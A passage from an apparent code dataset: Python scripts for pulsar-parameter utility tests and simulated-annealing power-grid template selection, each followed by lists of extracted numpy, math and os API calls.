dotslabel2.write('%8s'%getDots2[compt,0]+'%8s'%getDots2[compt,1]+'%8s'%getDots2[compt,2]+espace5+'%5s'%getrgb2[compt,0]+'%5s'%getrgb2[compt,1]+'%5s'%getrgb2[compt,2]+'\n')
compt=compt+1
compt=0
while(compt < len(getDots3)):
getDots3[compt]= label3[compt][0]
getrgb3[compt]= label3[compt][1]
if(verbose==1):
dotslabel3.write('%8s'%getDots3[compt,0]+'%8s'%getDots3[compt,1]+'%8s'%getDots3[compt,2]+espace5+'%5s'%getrgb3[compt,0]+'%5s'%getrgb3[compt,1]+'%5s'%getrgb3[compt,2]+'\n')
compt=compt+1
compt=0
while(compt < len(getDots4)):
getDots4[compt]= label4[compt][0]
getrgb4[compt]= label4[compt][1]
if(verbose==1):
dotslabel4.write('%8s'%getDots4[compt,0]+'%8s'%getDots4[compt,1]+'%8s'%getDots4[compt,2]+espace5+'%5s'%getrgb4[compt,0]+'%5s'%getrgb4[compt,1]+'%5s'%getrgb4[compt,2]+'\n')
compt=compt+1
if(verbose==1):
dotslabel1.close()
dotslabel2.close()
dotslabel3.close()
dotslabel4.close()
else:
os.remove("psa.in")
os.remove("psa.out")
return getDots, getrgb, getDots1, getrgb1, getDots2, getrgb2, getDots3, getrgb3, getDots4, getrgb4
|
[
"math.sqrt",
"numpy.array",
"numpy.empty",
"numpy.vstack",
"os.system",
"os.remove"
] |
[((776, 847), 'numpy.array', 'np.array', (['[[0, 0, 0], [0.9, 0.9, 0.9], [1, 0, 0], [0, 1, 0], [0, 0, 1]]'], {}), '([[0, 0, 0], [0.9, 0.9, 0.9], [1, 0, 0], [0, 1, 0], [0, 0, 1]])\n', (784, 847), True, 'import numpy as np\n'), ((3459, 3473), 'os.system', 'os.system', (['cmd'], {}), '(cmd)\n', (3468, 3473), False, 'import os\n'), ((3878, 3922), 'numpy.empty', 'np.empty', ([], {'shape': '[nbDots, 3]', 'dtype': '"""float64"""'}), "(shape=[nbDots, 3], dtype='float64')\n", (3886, 3922), True, 'import numpy as np\n'), ((3933, 3977), 'numpy.empty', 'np.empty', ([], {'shape': '[nbDots, 3]', 'dtype': '"""float64"""'}), "(shape=[nbDots, 3], dtype='float64')\n", (3941, 3977), True, 'import numpy as np\n'), ((7968, 7987), 'os.remove', 'os.remove', (['"""psa.in"""'], {}), "('psa.in')\n", (7977, 7987), False, 'import os\n'), ((7996, 8016), 'os.remove', 'os.remove', (['"""psa.out"""'], {}), "('psa.out')\n", (8005, 8016), False, 'import os\n'), ((4515, 4580), 'math.sqrt', 'math.sqrt', (['((xDot - xa) ** 2 + (yDot - ya) ** 2 + (zDot - za) ** 2)'], {}), '((xDot - xa) ** 2 + (yDot - ya) ** 2 + (zDot - za) ** 2)\n', (4524, 4580), False, 'import math\n'), ((4994, 5044), 'numpy.vstack', 'np.vstack', (['[getDots[comptDots], getrgb[comptDots]]'], {}), '([getDots[comptDots], getrgb[comptDots]])\n', (5003, 5044), True, 'import numpy as np\n'), ((2791, 2911), 'math.sqrt', 'math.sqrt', (['((getx[compt] - getx[compt2]) ** 2 + (gety[compt] - gety[compt2]) ** 2 + (\n getz[compt] - getz[compt2]) ** 2)'], {}), '((getx[compt] - getx[compt2]) ** 2 + (gety[compt] - gety[compt2]) **\n 2 + (getz[compt] - getz[compt2]) ** 2)\n', (2800, 2911), False, 'import math\n'), ((5098, 5148), 'numpy.vstack', 'np.vstack', (['[getDots[comptDots], getrgb[comptDots]]'], {}), '([getDots[comptDots], getrgb[comptDots]])\n', (5107, 5148), True, 'import numpy as np\n'), ((5202, 5252), 'numpy.vstack', 'np.vstack', (['[getDots[comptDots], getrgb[comptDots]]'], {}), '([getDots[comptDots], getrgb[comptDots]])\n', (5211, 5252), True, 'import numpy as np\n'), ((5306, 5356), 'numpy.vstack', 'np.vstack', (['[getDots[comptDots], getrgb[comptDots]]'], {}), '([getDots[comptDots], getrgb[comptDots]])\n', (5315, 5356), True, 'import numpy as np\n')]
|
"""
Test script for utils.py function.
"""
import os
import numpy as np
import pytest
from astropy import units as u
from cwinpy.utils import (
ellipticity_to_q22,
gcd_array,
get_psr_name,
initialise_ephemeris,
int_to_alpha,
is_par_file,
logfactorial,
q22_to_ellipticity,
)
from lalpulsar.PulsarParametersWrapper import PulsarParametersPy
def test_logfactorial():
"""
Test log factorial function
"""
a = 3
assert logfactorial(a) == np.log(3 * 2 * 1)
a = 3.0
assert logfactorial(a) == np.log(3 * 2 * 1)
def test_gcd_array():
"""
Test greatest common divisor function.
"""
a = 1 # non-list value
with pytest.raises(TypeError):
gcd_array(a)
a = [1] # single value
with pytest.raises(ValueError):
gcd_array(a)
a = [5, 25, 90]
assert gcd_array(a) == 5
def test_int_to_alpha():
"""
Test integer to alphabetical string conversion.
"""
pos = 2.3
with pytest.raises(TypeError):
int_to_alpha(pos)
pos = -1
with pytest.raises(ValueError):
int_to_alpha(pos)
assert int_to_alpha(1) == "A"
assert int_to_alpha(1, case="lower") == "a"
assert int_to_alpha(26) == "Z"
assert int_to_alpha(26, case="lower") == "z"
assert int_to_alpha(27) == "AA"
assert int_to_alpha(28) == "AB"
assert int_to_alpha(200) == "GR"
assert int_to_alpha(1000) == "ALL"
def test_is_par_file():
"""
Test failure of is_par_file.
"""
assert is_par_file("blah_blah_blah") is False
# test par files that don't contain required attributes
brokenpar = "broken.par"
values = {
"F": [100.0],
"RAJ": 0.1,
"DECJ": -0.1,
"PSRJ": "J0101-0101",
}
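# drop one required key at a time and check that the truncated par file is rejected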
for leavekey in list(values.keys()):
keys = list(values.keys())
psr = PulsarParametersPy()
for key in keys:
if key != leavekey:
psr[key] = values[key]
psr.pp_to_par(brokenpar)
assert is_par_file(brokenpar) is False
os.remove(brokenpar)
def test_get_psr_name():
"""
Test extraction of pulsar name.
"""
for item, name in zip(
["PSRJ", "PSRB", "PSR", "NAME"],
["J0123+1234", "B0124+12", "J0123+1234", "B0124+12"],
):
psr = PulsarParametersPy()
psr[item] = name
assert get_psr_name(psr) == name
def test_ellipticity_to_q22():
"""
Test ellipticity conversion to mass quadrupole.
"""
epsilon = [1e-9, 1e-8]
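# expected values follow Q22 = eps * 1e38 * sqrt(15 / (8*pi)), where 1e38 kg m^2 is the canonical moment of inertia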
expected_q22 = np.array([1e29, 1e30]) * np.sqrt(15.0 / (8.0 * np.pi))
q22 = ellipticity_to_q22(epsilon[0])
assert np.isclose(q22, expected_q22[0])
# test units
q22units = ellipticity_to_q22(epsilon[0], units=True)
assert np.isclose(q22units.value, expected_q22[0])
assert q22units.unit == u.Unit("kg m2")
# test array like
q22 = ellipticity_to_q22(epsilon)
assert len(q22) == len(epsilon)
assert np.allclose(q22, expected_q22)
def test_q22_to_ellipticity_to_q22():
"""
Test mass quadrupole conversion to ellipticity.
"""
q22 = [1e29, 1e30]
expected_epsilon = np.array([1e-9, 1e-8]) / np.sqrt(15.0 / (8.0 * np.pi))
epsilon = q22_to_ellipticity(q22[0])
assert np.isclose(epsilon, expected_epsilon[0])
# test array like
epsilon = q22_to_ellipticity(q22)
assert len(q22) == len(epsilon)
assert np.allclose(epsilon, expected_epsilon)
# test no unit
epsilon = q22_to_ellipticity(q22[0] * u.kg * u.m ** 2)
assert np.isclose(epsilon, expected_epsilon[0])
assert not hasattr(epsilon, "unit")
def test_initialise_ephemeris():
"""
Test reading of ephemeris files.
"""
with pytest.raises(ValueError):
initialise_ephemeris(units="lhfld")
with pytest.raises(IOError):
initialise_ephemeris(
earthfile="jksgdksg", sunfile="lhlbca", timefile="lshdldgls"
)
with pytest.raises(IOError):
initialise_ephemeris(
earthfile="jksgdksg", sunfile="lhlbca", timefile="lshdldgls"
)
with pytest.raises(IOError):
initialise_ephemeris(timefile="lshdldgls")
edat, tdat = initialise_ephemeris()
assert edat.nentriesE == 175322
assert edat.nentriesS == 17534
assert edat.dtEtable == 7200.0
assert edat.dtStable == 72000.0
assert edat.etype == 2
assert tdat.nentriesT == 87660
assert tdat.dtTtable == 14400.0
|
[
"cwinpy.utils.int_to_alpha",
"numpy.allclose",
"numpy.isclose",
"numpy.sqrt",
"astropy.units.Unit",
"numpy.log",
"cwinpy.utils.q22_to_ellipticity",
"os.remove",
"numpy.array",
"cwinpy.utils.is_par_file",
"cwinpy.utils.ellipticity_to_q22",
"pytest.raises",
"lalpulsar.PulsarParametersWrapper.PulsarParametersPy",
"cwinpy.utils.gcd_array",
"cwinpy.utils.initialise_ephemeris",
"cwinpy.utils.get_psr_name",
"cwinpy.utils.logfactorial"
] |
[((2618, 2648), 'cwinpy.utils.ellipticity_to_q22', 'ellipticity_to_q22', (['epsilon[0]'], {}), '(epsilon[0])\n', (2636, 2648), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((2661, 2693), 'numpy.isclose', 'np.isclose', (['q22', 'expected_q22[0]'], {}), '(q22, expected_q22[0])\n', (2671, 2693), True, 'import numpy as np\n'), ((2727, 2769), 'cwinpy.utils.ellipticity_to_q22', 'ellipticity_to_q22', (['epsilon[0]'], {'units': '(True)'}), '(epsilon[0], units=True)\n', (2745, 2769), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((2782, 2825), 'numpy.isclose', 'np.isclose', (['q22units.value', 'expected_q22[0]'], {}), '(q22units.value, expected_q22[0])\n', (2792, 2825), True, 'import numpy as np\n'), ((2903, 2930), 'cwinpy.utils.ellipticity_to_q22', 'ellipticity_to_q22', (['epsilon'], {}), '(epsilon)\n', (2921, 2930), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((2979, 3009), 'numpy.allclose', 'np.allclose', (['q22', 'expected_q22'], {}), '(q22, expected_q22)\n', (2990, 3009), True, 'import numpy as np\n'), ((3234, 3260), 'cwinpy.utils.q22_to_ellipticity', 'q22_to_ellipticity', (['q22[0]'], {}), '(q22[0])\n', (3252, 3260), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((3273, 3313), 'numpy.isclose', 'np.isclose', (['epsilon', 'expected_epsilon[0]'], {}), '(epsilon, expected_epsilon[0])\n', (3283, 3313), True, 'import numpy as np\n'), ((3351, 3374), 'cwinpy.utils.q22_to_ellipticity', 'q22_to_ellipticity', (['q22'], {}), '(q22)\n', (3369, 3374), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((3423, 3461), 'numpy.allclose', 'np.allclose', (['epsilon', 'expected_epsilon'], {}), '(epsilon, expected_epsilon)\n', (3434, 3461), True, 'import numpy as np\n'), ((3496, 3540), 'cwinpy.utils.q22_to_ellipticity', 'q22_to_ellipticity', (['(q22[0] * u.kg * u.m ** 2)'], {}), '(q22[0] * u.kg * u.m ** 2)\n', (3514, 3540), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((3553, 3593), 'numpy.isclose', 'np.isclose', (['epsilon', 'expected_epsilon[0]'], {}), '(epsilon, expected_epsilon[0])\n', (3563, 3593), True, 'import numpy as np\n'), ((4200, 4222), 'cwinpy.utils.initialise_ephemeris', 'initialise_ephemeris', ([], {}), '()\n', (4220, 4222), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((470, 485), 'cwinpy.utils.logfactorial', 'logfactorial', (['a'], {}), '(a)\n', (482, 485), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((489, 506), 'numpy.log', 'np.log', (['(3 * 2 * 1)'], {}), '(3 * 2 * 1)\n', (495, 506), True, 'import numpy as np\n'), ((531, 546), 'cwinpy.utils.logfactorial', 'logfactorial', (['a'], {}), '(a)\n', (543, 546), False, 'from cwinpy.utils import ellipticity_to_q22, 
gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((550, 567), 'numpy.log', 'np.log', (['(3 * 2 * 1)'], {}), '(3 * 2 * 1)\n', (556, 567), True, 'import numpy as np\n'), ((689, 713), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (702, 713), False, 'import pytest\n'), ((723, 735), 'cwinpy.utils.gcd_array', 'gcd_array', (['a'], {}), '(a)\n', (732, 735), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((774, 799), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (787, 799), False, 'import pytest\n'), ((809, 821), 'cwinpy.utils.gcd_array', 'gcd_array', (['a'], {}), '(a)\n', (818, 821), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((854, 866), 'cwinpy.utils.gcd_array', 'gcd_array', (['a'], {}), '(a)\n', (863, 866), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((991, 1015), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (1004, 1015), False, 'import pytest\n'), ((1025, 1042), 'cwinpy.utils.int_to_alpha', 'int_to_alpha', (['pos'], {}), '(pos)\n', (1037, 1042), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((1066, 1091), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (1079, 1091), False, 'import pytest\n'), ((1101, 1118), 'cwinpy.utils.int_to_alpha', 'int_to_alpha', (['pos'], {}), '(pos)\n', (1113, 1118), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((1131, 1146), 'cwinpy.utils.int_to_alpha', 'int_to_alpha', (['(1)'], {}), '(1)\n', (1143, 1146), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((1165, 1194), 'cwinpy.utils.int_to_alpha', 'int_to_alpha', (['(1)'], {'case': '"""lower"""'}), "(1, case='lower')\n", (1177, 1194), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((1213, 1229), 'cwinpy.utils.int_to_alpha', 'int_to_alpha', (['(26)'], {}), '(26)\n', (1225, 1229), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((1248, 1278), 'cwinpy.utils.int_to_alpha', 'int_to_alpha', (['(26)'], {'case': '"""lower"""'}), "(26, case='lower')\n", (1260, 1278), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((1297, 1313), 'cwinpy.utils.int_to_alpha', 'int_to_alpha', (['(27)'], {}), '(27)\n', (1309, 1313), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((1333, 1349), 'cwinpy.utils.int_to_alpha', 'int_to_alpha', (['(28)'], {}), '(28)\n', (1345, 1349), False, 'from cwinpy.utils import 
ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((1369, 1386), 'cwinpy.utils.int_to_alpha', 'int_to_alpha', (['(200)'], {}), '(200)\n', (1381, 1386), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((1406, 1424), 'cwinpy.utils.int_to_alpha', 'int_to_alpha', (['(1000)'], {}), '(1000)\n', (1418, 1424), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((1521, 1550), 'cwinpy.utils.is_par_file', 'is_par_file', (['"""blah_blah_blah"""'], {}), "('blah_blah_blah')\n", (1532, 1550), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((1857, 1877), 'lalpulsar.PulsarParametersWrapper.PulsarParametersPy', 'PulsarParametersPy', ([], {}), '()\n', (1875, 1877), False, 'from lalpulsar.PulsarParametersWrapper import PulsarParametersPy\n'), ((2065, 2085), 'os.remove', 'os.remove', (['brokenpar'], {}), '(brokenpar)\n', (2074, 2085), False, 'import os\n'), ((2317, 2337), 'lalpulsar.PulsarParametersWrapper.PulsarParametersPy', 'PulsarParametersPy', ([], {}), '()\n', (2335, 2337), False, 'from lalpulsar.PulsarParametersWrapper import PulsarParametersPy\n'), ((2553, 2577), 'numpy.array', 'np.array', (['[1e+29, 1e+30]'], {}), '([1e+29, 1e+30])\n', (2561, 2577), True, 'import numpy as np\n'), ((2578, 2607), 'numpy.sqrt', 'np.sqrt', (['(15.0 / (8.0 * np.pi))'], {}), '(15.0 / (8.0 * np.pi))\n', (2585, 2607), True, 'import numpy as np\n'), ((2854, 2869), 'astropy.units.Unit', 'u.Unit', (['"""kg m2"""'], {}), "('kg m2')\n", (2860, 2869), True, 'from astropy import units as u\n'), ((3165, 3189), 'numpy.array', 'np.array', (['[1e-09, 1e-08]'], {}), '([1e-09, 1e-08])\n', (3173, 3189), True, 'import numpy as np\n'), ((3190, 3219), 'numpy.sqrt', 'np.sqrt', (['(15.0 / (8.0 * np.pi))'], {}), '(15.0 / (8.0 * np.pi))\n', (3197, 3219), True, 'import numpy as np\n'), ((3732, 3757), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (3745, 3757), False, 'import pytest\n'), ((3767, 3802), 'cwinpy.utils.initialise_ephemeris', 'initialise_ephemeris', ([], {'units': '"""lhfld"""'}), "(units='lhfld')\n", (3787, 3802), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((3813, 3835), 'pytest.raises', 'pytest.raises', (['IOError'], {}), '(IOError)\n', (3826, 3835), False, 'import pytest\n'), ((3845, 3932), 'cwinpy.utils.initialise_ephemeris', 'initialise_ephemeris', ([], {'earthfile': '"""jksgdksg"""', 'sunfile': '"""lhlbca"""', 'timefile': '"""lshdldgls"""'}), "(earthfile='jksgdksg', sunfile='lhlbca', timefile=\n 'lshdldgls')\n", (3865, 3932), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((3960, 3982), 'pytest.raises', 'pytest.raises', (['IOError'], {}), '(IOError)\n', (3973, 3982), False, 'import pytest\n'), ((3992, 4079), 'cwinpy.utils.initialise_ephemeris', 'initialise_ephemeris', ([], {'earthfile': '"""jksgdksg"""', 'sunfile': '"""lhlbca"""', 'timefile': '"""lshdldgls"""'}), "(earthfile='jksgdksg', sunfile='lhlbca', timefile=\n 'lshdldgls')\n", (4012, 
4079), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((4107, 4129), 'pytest.raises', 'pytest.raises', (['IOError'], {}), '(IOError)\n', (4120, 4129), False, 'import pytest\n'), ((4139, 4181), 'cwinpy.utils.initialise_ephemeris', 'initialise_ephemeris', ([], {'timefile': '"""lshdldgls"""'}), "(timefile='lshdldgls')\n", (4159, 4181), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((2024, 2046), 'cwinpy.utils.is_par_file', 'is_par_file', (['brokenpar'], {}), '(brokenpar)\n', (2035, 2046), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((2379, 2396), 'cwinpy.utils.get_psr_name', 'get_psr_name', (['psr'], {}), '(psr)\n', (2391, 2396), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n')]
|
#BSD 3-Clause License
#
#Copyright (c) 2019, The Regents of the University of Minnesota
#
#All rights reserved.
#
#Redistribution and use in source and binary forms, with or without
#modification, are permitted provided that the following conditions are met:
#
#* Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
#* Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
#* Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
#THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
#AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
#IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
#DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
#FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
#DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
#SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
#CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
#OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
#OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Mar 21 21:16:37 2019
This is the main code that runs simulated annealing to generate the data
@author: <NAME>
"""
import sys
import numpy as np
from create_template import define_templates
from T6_PSI_settings import T6_PSI_settings
from simulated_annealer import simulated_annealer
import random
from tqdm import tqdm
#from eliminate_templates import load_template_list
def main():
# Read the json user input file and the current maps that need to be run
# taken as an argument from the scripts
settings_obj = T6_PSI_settings.load_obj()
if len(sys.argv) == 3:
map_start = int(sys.argv[1])
num_maps = int(sys.argv[2])
congestion_enabled = 1
elif len(sys.argv) == 4:
map_start = int(sys.argv[1])
num_maps = int(sys.argv[2])
if sys.argv[3] == "no_congestion":
congestion_enabled = 0
else:
congestion_enabled = 1
else:
map_start = 1
num_maps = 15
congestion_enabled = 1
print("Warning defaulting to %d %d and with congestion" % (map_start, num_maps))
print(sys.argv)
#print(num_maps)
# Initialize the SA parameters
T_init = 70
T_final = 0.0005
alpha_temp = 0.95
num_moves_per_step = 5
state = [] #np.zeros((num_maps, settings_obj.NUM_REGIONS))
e = []#np.zeros(num_maps)
max_drop = [] #np.zeros((num_maps, settings_obj.NUM_REGIONS))
template_list = define_templates(settings_obj, generate_g=0)
congestion = []
all_templates = settings_obj.load_template_list()#range(settings_obj.NUM_TEMPLATES))
size_region_x = int(settings_obj.WIDTH_REGION * 1e6)
size_region_y = int(settings_obj.LENGTH_REGION * 1e6)
current_maps = []
for i in tqdm(range(num_maps)):
# print(i)
power_map_file = settings_obj.map_dir + "current_map_%d.csv" % (
i + map_start)
currents = np.genfromtxt(power_map_file, delimiter=',')
for y in range(settings_obj.current_map_num_regions):
for x in range(settings_obj.current_map_num_regions):
print("%d %d "%(x,y))
#region and neighbors
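                # Build a 3x3 block of regions centred on region (x, y); the
                # if/elif ladder below copies the neighbours that exist into it,
                # while regions outside the current map are left as zeros
                # (zero-padding at the map boundary).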
current_region = np.zeros((3*size_region_x,3*size_region_y))
init_state = np.zeros(9, int)
if congestion_enabled == 1 :
signal_cong = [0.3 + 0.7*random.uniform(0, 1) for _ in range(9) ]
else:
signal_cong = [0 for _ in range(9) ]
if x == 0:
x_start = 0
x_end = x_start+2*size_region_x
if y == 0:
y_start = 0
y_end = y_start+2*size_region_y
current_region[size_region_x:,size_region_y:] = (
currents[x_start:x_end,y_start:y_end])
elif y == settings_obj.current_map_num_regions-1:
y_start = (y-1)*size_region_y
y_end = y_start+2*size_region_y
current_region[size_region_x:,0:2*size_region_y] = (
currents[x_start:x_end,y_start:y_end])
else:
y_start = (y-1)*size_region_y
y_end = y_start+3*size_region_y
current_region[size_region_x:,:] = (
currents[x_start:x_end,y_start:y_end])
elif x == settings_obj.current_map_num_regions-1:
x_start = (x-1)*size_region_x
x_end = x_start+2*size_region_x
if y == 0:
y_start = 0
y_end = y_start+2*size_region_y
current_region[0:2*size_region_x,size_region_y:] = (
currents[x_start:x_end,y_start:y_end])
elif y == settings_obj.current_map_num_regions-1:
y_start = (y-1)*size_region_y
y_end = y_start+2*size_region_y
current_region[0:2*size_region_x,0:2*size_region_y] = (
currents[x_start:x_end,y_start:y_end])
else:
y_start = (y-1)*size_region_y
y_end = y_start+3*size_region_y
current_region[0:2*size_region_x,:] = (
currents[x_start:x_end,y_start:y_end])
else:
x_start = (x-1)*size_region_x
x_end = x_start+3*size_region_x
if y == 0:
y_start = 0
y_end = y_start+2*size_region_y
current_region[:,size_region_y:] = (
currents[x_start:x_end,y_start:y_end])
elif y == settings_obj.current_map_num_regions-1:
y_start = (y-1)*size_region_y
y_end = y_start+2*size_region_y
current_region[:,0:2*size_region_y] = (
currents[x_start:x_end,y_start:y_end])
else:
y_start = (y-1)*size_region_y
y_end = y_start+3*size_region_y
current_region[:,:] = (
currents[x_start:x_end,y_start:y_end])
pdn_opt = simulated_annealer(init_state, T_init, T_final,
alpha_temp, num_moves_per_step,
current_region,congestion_enabled)
n_state, n_e, n_max_drop = pdn_opt.sim_anneal(
all_templates, template_list,signal_cong)
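            # n_state: template chosen for each of the 9 regions, n_e: final
            # annealing energy (cost), n_max_drop: maximum drop reported by the
            # annealer (presumably the worst-case IR drop per region).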
state.append(n_state)
max_drop.append(n_max_drop)
congestion.append(signal_cong)
current_maps.append(current_region.reshape(-1))
e.append(n_e)
#print(n_state,n_max_drop,signal_cong,n_e)
with open(
settings_obj.parallel_run_dir + 'max_drop_%d_to_%d.csv' %
(map_start, map_start + num_maps - 1), 'w') as outfile:
np.savetxt(outfile, max_drop, delimiter=',', fmt='%f')
with open(
settings_obj.parallel_run_dir + 'state_%d_to_%d.csv' %
(map_start, map_start + num_maps - 1), 'w') as outfile:
np.savetxt(outfile, state, delimiter=',', fmt='%d')
with open(
settings_obj.parallel_run_dir + 'energy_%d_to_%d.csv' %
(map_start, map_start + num_maps - 1), 'w') as outfile:
np.savetxt(outfile, e, delimiter=',', fmt='%f')
if congestion_enabled ==1:
with open(
settings_obj.parallel_run_dir + 'congest_%d_to_%d.csv' %
(map_start, map_start + num_maps - 1), 'w') as outfile:
np.savetxt(outfile,congestion, delimiter=',', fmt='%f')
with open(
settings_obj.parallel_run_dir + 'current_maps_%d_to_%d.csv' %
(map_start, map_start + num_maps - 1), 'w') as outfile:
np.savetxt(outfile,current_maps, delimiter=',', fmt='%f')
if __name__ == '__main__':
main()
|
[
"create_template.define_templates",
"random.uniform",
"simulated_annealer.simulated_annealer",
"numpy.zeros",
"numpy.savetxt",
"T6_PSI_settings.T6_PSI_settings.load_obj",
"numpy.genfromtxt"
] |
[((2165, 2191), 'T6_PSI_settings.T6_PSI_settings.load_obj', 'T6_PSI_settings.load_obj', ([], {}), '()\n', (2189, 2191), False, 'from T6_PSI_settings import T6_PSI_settings\n'), ((3075, 3119), 'create_template.define_templates', 'define_templates', (['settings_obj'], {'generate_g': '(0)'}), '(settings_obj, generate_g=0)\n', (3091, 3119), False, 'from create_template import define_templates\n'), ((3539, 3583), 'numpy.genfromtxt', 'np.genfromtxt', (['power_map_file'], {'delimiter': '""","""'}), "(power_map_file, delimiter=',')\n", (3552, 3583), True, 'import numpy as np\n'), ((7825, 7879), 'numpy.savetxt', 'np.savetxt', (['outfile', 'max_drop'], {'delimiter': '""","""', 'fmt': '"""%f"""'}), "(outfile, max_drop, delimiter=',', fmt='%f')\n", (7835, 7879), True, 'import numpy as np\n'), ((8034, 8085), 'numpy.savetxt', 'np.savetxt', (['outfile', 'state'], {'delimiter': '""","""', 'fmt': '"""%d"""'}), "(outfile, state, delimiter=',', fmt='%d')\n", (8044, 8085), True, 'import numpy as np\n'), ((8241, 8288), 'numpy.savetxt', 'np.savetxt', (['outfile', 'e'], {'delimiter': '""","""', 'fmt': '"""%f"""'}), "(outfile, e, delimiter=',', fmt='%f')\n", (8251, 8288), True, 'import numpy as np\n'), ((8709, 8767), 'numpy.savetxt', 'np.savetxt', (['outfile', 